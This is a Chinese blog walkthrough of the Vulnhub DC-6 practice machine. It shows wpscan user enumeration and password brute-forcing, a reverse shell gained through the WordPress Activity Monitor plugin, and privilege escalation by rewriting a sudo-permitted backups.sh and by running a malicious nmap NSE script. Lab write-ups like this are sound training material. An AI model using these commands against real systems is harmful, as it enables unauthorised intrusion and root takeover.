Vulnhub-DC-6

入门系列第三弹DC-6

基本信息

下载地址:DC-6
靶机:vmware,192.168.172.138
攻击机:kali2
Flag:1个

渗透过程

0x01 nmap扫描

扫描一下,只有22和80开放,然后注意一下作者告诉我们配置一下host了,记得改成wordy。
在这里插入图片描述

0x02 漏洞发现

访问wordy后,发现还是和之前的dc-2一个界面啊,估计又是wp吧。
在这里插入图片描述
访问一下/wp-admin成功之后,确认就是wp了,wpscan一样先扫一手用户名。然后保存一下,准备爆破。

wpscan --url http://wordy/ -e u

在这里插入图片描述
这个时候如果直接用字典的话,可能会浪费很多时间。记得看一看作者写的信息。
可以看见作者给了我们一条命令用来生成字典。

Clue
OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. 😉

开始跑账户密码。找到了mark的密码。

wpscan --url http://wordy/ -e --usernames username.txt -P password.txt

在这里插入图片描述
进入后台后看一看,最开始直接扫描的时候是没看见有什么插件的。进来后看见使用了Activity monitor插件,搜索一下看看有没有可以使用的漏洞。发现了三个,使用第三个页面。
在这里插入图片描述

0x03 漏洞利用

首先看一下EXP,将其中的利用部分url改为wordy,将nc反弹命令修改一下。
在这里插入图片描述
然后生成html页面,点击界面中的按钮,并监听对应端口。经典操作反弹交互shell。
在这里插入图片描述

0x04 水平越权

我们是有mark用户的,那不如先去/home看看,发现stuff,看一看,发现things-to-do.txt。发现有一个账户密码。
在这里插入图片描述

su看一下这个账户有什么。发现有一个不需要密码执行的文件。
在这里插入图片描述
看一下什么内容。发现是一个打包命令。既然是可执行的,那么就直接写命令反弹jens的shell。
在这里插入图片描述

如下执行命令。

cat /dev/null > /home/jens/backups.sh #清除源文件内容
vi /home/jens/backups.sh
i #输入模式
/bin/bash #切换jens的shell
ESC #进入命令模式
:wq #保存退出

然后我们执行命令。成功切换到jens。

sudo -u jens /home/jens/backups.sh

在这里插入图片描述

看一下可使用的命令,发现可以无密码使用nmap命令。
在这里插入图片描述

我们知道nmap是存在很多.nse的脚本的,直接在当前目录下写一个脚本,反弹root的shell。

echo "os.execute('/bin/bash')" > root.nse
sudo nmap --script root.nse

在这里插入图片描述

0x05 Get Flag

搞定。
在这里插入图片描述

总结

DC-6以WordPress的插件Activity monitor漏洞利用和水平越权为渗透的关键利用。有不会的命令和工具时一定要多用help和man,切忌直接百度~继续加油~

©️2020 CSDN 皮肤主题: 1024 设计师:上身试试 返回首页